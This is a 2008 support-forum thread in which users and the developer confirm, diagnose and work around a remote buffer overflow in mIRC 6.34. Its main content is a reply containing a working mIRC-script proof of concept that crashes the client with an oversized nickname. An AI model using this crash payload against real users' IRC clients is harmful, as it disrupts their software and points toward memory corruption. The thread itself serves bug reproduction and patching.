#204830 - 03/10/08 10:38 AM
Mirc 6.34 Remote Buffer Overflow
|
emm1
newbie
Registered: 03/10/08
Posts: 1
|
Hello, I was just notified of this bug here. Hopefully someone can address it quickly.
http://www.milw0rm.com/exploits/6654
|
|
Top
|
|
|
|
|
#204831 - 03/10/08 01:05 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: emm1]
|
Collective
Carpal Tunnel
Registered: 10/12/02
Posts: 3195
Loc: London, UK
|
Confirmed, crashes a clean mIRC 6.34.
|
|
Top
|
|
|
|
|
#204832 - 03/10/08 01:36 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: emm1]
|
Khaled
Pooh-Bah
Registered: 05/12/02
Posts: 1859
|
This is a server-based expoit, not a user-based exploit, so as long as you're connecting to a trusted IRC network, such as one of the major networks, you should be fine.
That said, I can't seem to reproduce this issue here so far, neither in a clean install of the release version nor in a debug version of mIRC.
When I test the perl script and make mIRC connect to the local perl server, nothing happens, other than a disconnect from the server because the server sequence is incorrect.
When I test the same string sequence using internal debugging in mIRC, again nothing happens other than mIRC opening a query window to that user.
I'll continue to try to reproduce this issue and if verified I should have an update out shortly.
|
|
Top
|
|
|
|
|
#204867 - 04/10/08 02:53 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: Khaled]
|
Pivo
journeyman
Registered: 23/06/08
Posts: 58
|
That Perl Script is crashing both my modified and my clean installation of mIRC.
Screenshot
Windows XP Service Pack 3, mIRC 6.34, ...
Edit: I have translated this into an mIRC script, for easier testing...
To start listening, type /crash ...
alias crash {
; check for open sockets
if ($sock(crashing*)) {
sockclose crashing*
echo -sgt Crash-Sockets closed.
return
}
; determining port
var %p = 6667
while (!$portfree(%p) && %p <= 65535) { inc %p }
if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return }
; listening
socklisten crashing %p
if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return }
echo -sgt Crash-Socket listening...
echo -sgt Type �04/server localhost %p $+ � to crash mirc.
}
on *:socklisten:crashing: {
var %s = crashing. $+ $ticks
sockaccept %s
sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow
sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow.
echo -sgt Sending crash-message to $sock(%s).ip
.timer 1 3 sockclose %s
}
Edited by Pivo (04/10/08 05:30 PM)
|
|
Top
|
|
|
|
|
#204899 - 05/10/08 12:24 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: Khaled]
|
Sat
addict
Registered: 19/04/04
Posts: 531
Loc: The Netherlands
|
The problem is with the sprintf(buf, "f%s", nick); of the code getting the font for the new query window from mirc.ini - buf is 300 bytes, nick is taken directly from the server.
Temporary workaround until the new mIRC is out:
on ^*:OPEN:?:*:if ($len($nick) > 298) halt
Other, more invasive workarounds: use a dedicated query window, put queries on ignore, etc.
_________________________
Saturn, QuakeNet staff
|
|
Top
|
|
|
|
|
#204962 - 07/10/08 07:15 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: Sat]
|
Khaled
Pooh-Bah
Registered: 05/12/02
Posts: 1859
|
Thanks, I have been able to reproduce this issue and should have an update ready for release soon. In the meantime, the above script-based fix posted by Sat resolves the issue, as does enabling the "Use single message window" option in the mIRC Options/IRC dialog.
|
|
Top
|
|
|
|
|
#204965 - 07/10/08 11:59 PM
Re: Mirc 6.34 Remote Buffer Overflow
[Re: Khaled]
|
Trashlord_
journeyman
Registered: 26/10/07
Posts: 52
Loc: Israel
|
Just wanted to add that I have tested this under WINE in Linux, and mIRC crashes there as well.
|
|
Top
|
|
|
|
Moderator: d00dman, Hammer, Karen, Krejt, Mentality, Merlin, MIMP, ParaBrat, qwerty
|
|
